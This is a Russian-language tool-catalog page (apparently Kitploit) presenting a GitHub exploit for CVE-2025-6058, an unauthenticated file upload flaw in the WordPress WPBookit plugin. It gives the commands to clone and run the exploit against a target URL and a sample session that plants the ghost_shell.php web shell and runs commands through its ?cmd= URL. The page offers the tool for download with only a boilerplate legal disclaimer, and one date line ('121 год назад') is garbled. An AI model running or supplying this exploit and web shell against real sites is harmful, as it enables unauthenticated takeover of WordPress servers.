Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Эксплойт неаутентифицированной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 Эксплойт неаутентифицированной загрузки файлов

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WordPress Logo

🚨 CVE-2025-6058 — Эксплойт неаутентифицированной загрузки файлов в WordPress WPBookit ≤ 1.0.4

Эксплойт неаутентифицированной произвольной загрузки файлов, нацеленный на плагин WPBookit для WordPress (≤ 1.0.4)
Эксплойт позволяет удалённо загрузить shell и выполнить полный набор команд.

Автор: 0xgh057r3c0n


📌 Об уязвимости

CVE-2025-6058 — критическая уязвимость, затрагивающая плагин WPBookit на CMS WordPress. Неаутентифицированный злоумышленник может злоупотребить уязвимой AJAX-конечной точкой для загрузки произвольных PHP-файлов, что позволяет выполнить удалённый код (RCE).

  • 🎯 Цель: CMS WordPress (уязвимый плагин WPBookit)
  • 📦 Затронутый плагин: WPBookit ≤ 1.0.4
  • ⚠️ Уровень риска: Критический (неаутентифицированный RCE)

✨ Возможности

  • 🔍 Автоматическое определение версии плагина WordPress через README.txt
  • 📤 Загрузка лёгкого PHP-шелла (ghost_shell.php)
  • 🖥️ Интерактивный shell (в стиле Parrot)
  • 🌐 Не требует аутентификации — вход не нужен
  • 🎨 Цветной вывод в CLI

🚀 Инструкция по использованию

💻 Требования

root@kitploit:~
python3 --version
pip install requests

⚙️ Запуск эксплойта

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ Пример сессии shell

root@kitploit:~
python3 CVE-2025-6058.py -u https://victim.com

[>] Проверка версии плагина...
[+] Обнаружена версия плагина: 1.0.4
[!] Целевая версия уязвима.

[>] Загрузка shell...
[+] Загрузка выполнена успешно.
[+] URL shell: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Запущен интерактивный GhostShell — введите 'exit' для выхода.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 Детали shell

  • Имя файла: ghost_shell.php
  • Путь: /wp-content/uploads/YYYY/MM/ghost_shell.php
  • Пример:
root@kitploit:~
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

⚠️ Правовое предупреждение

Данный эксплойт разработан в образовательных целях и для авторизованного тестирования на проникновение. Несанкционированное использование против систем без явного согласия противозаконно.


📄 Лицензия

Распространяется под лицензией MIT


Создано для аудита безопасности WordPress 🛡️ автором 0xgh057r3c0n

Скачать инструмент